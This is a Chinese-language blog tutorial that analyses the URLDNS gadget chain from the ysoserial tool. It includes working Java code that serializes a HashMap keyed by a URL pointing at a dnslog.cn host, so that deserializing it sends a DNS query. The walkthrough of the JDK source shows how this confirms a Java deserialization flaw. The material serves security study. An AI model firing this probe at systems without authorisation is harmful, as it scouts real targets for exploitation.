java安全——ysoserial工具URLDNS链分析

Posted 2022-05-05 songly_

本篇我们将学习ysoserial工具的URLDNS链，相对于前面学习的CC链来说，URLDNS链就比较简单了。

URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链，通过URLDNS利用链可以发起一次DNS查询请求，从而可以验证目标站点是否存在反序列化漏洞，并且该利用链任何不需要第三方依赖，也没有JDK版本的限制。

但是URLDNS利用链也只能用于发起DNS查询请求，也不能做其他事情，因此URLDNS链更多的是用于POC检测。

有了前面的基础，这里直接上URLDNS链的代码（URLDNS链环境为jdk1.8版本）：

package com.urldns;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class URLDNSTest 

    public static void main(String[] args) throws Exception 
        HashMap<URL, String> hashMap = new HashMap<URL, String>();
        // 设置dns查询url
        URL url = new URL("http://5aaub7.dnslog.cn");
        // 在put前修改url的hashcode为非-1的值，put后将hashcode修改为-1
        Field field = Class.forName("java.net.URL").getDeclaredField("hashCode");
        field.setAccessible(true);
        //修改url的hashCode字段的值，再put到hashmap中
        field.set(url, 111);
        hashMap.put(url, "xxxx");
        //将url的hashCode修改为-1
        field.set(url, -1);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        //序列化
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(hashMap);
        oos.close();
        //反序列化，触发漏洞
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    

执行程序后，URLDNS链会发送一次DNS查询的请求操作，这样我们就可以通过DNSLog平台的回显的信息来判断目标是否存在反序列化漏洞

 URLDNS链的入口是hashMap的readObject方法

    private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException 
		
			//省略部分代码......
			
            for (int i = 0; i < mappings; i++) 
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                 //还原对象
                putVal(hash(key), key, value, false, false);
            
        
    

hashMap调用readObject方法在反序列化时会先计算key的hash值，然后再调用putVal方法把键值对放入到hashMap中，还原对象。

hash方法内部会调用key的hashCode方法，这里的key值其实是URLDNS链中构造的url对象

    static final int hash(Object key) 
        int h;
		//调用key的hashCode方法
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    

key.hashCode操作实际上是调用了url对象的hashCode，判断url对象的hashCode值是否为-1，如果hashCode属性的值不为-1，说明hashCode其实已经有值了，那么会直接返回哈希值。

	public synchronized int hashCode() 
        if (hashCode != -1)
            return hashCode;
        //调用hashCode方法触发DNS查询请求
        hashCode = handler.hashCode(this);
        return hashCode;
    

在构造URLDNS链的时候，我们通过反射将hashCode成员属性的值改回了-1

field.set(url, -1);

因此这里会继续往下执行，调用handler的hashCode方法（实际上是调用了URLStreamHandler类的hashCode方法）。

URLStreamHandler类的hashCode方法内部调用了一个getHostAddress方法获取url地址，这一步会触发DNS查询请求

    protected int hashCode(URL u) 
        int h = 0;

        //获取url协议
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        //获取url地址
        InetAddress addr = getHostAddress(u);
        if (addr != null) 
            h += addr.hashCode();
         else 
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    
	

我们继续跟进getHostAddress方法，可以看到内部调用了一个getByName方法，这个方法会根据url地址返回一个ip地址，也就是说getByName方法会发送一个DNS查询请求。

其实前面构造URLDNS链时，将url对象的hashCode属性的值改回-1的目的是为了调用InetAddress.getByName方法。

URLDNS利用链的调用过程如下

参考资料：

https://xz.aliyun.com/t/9417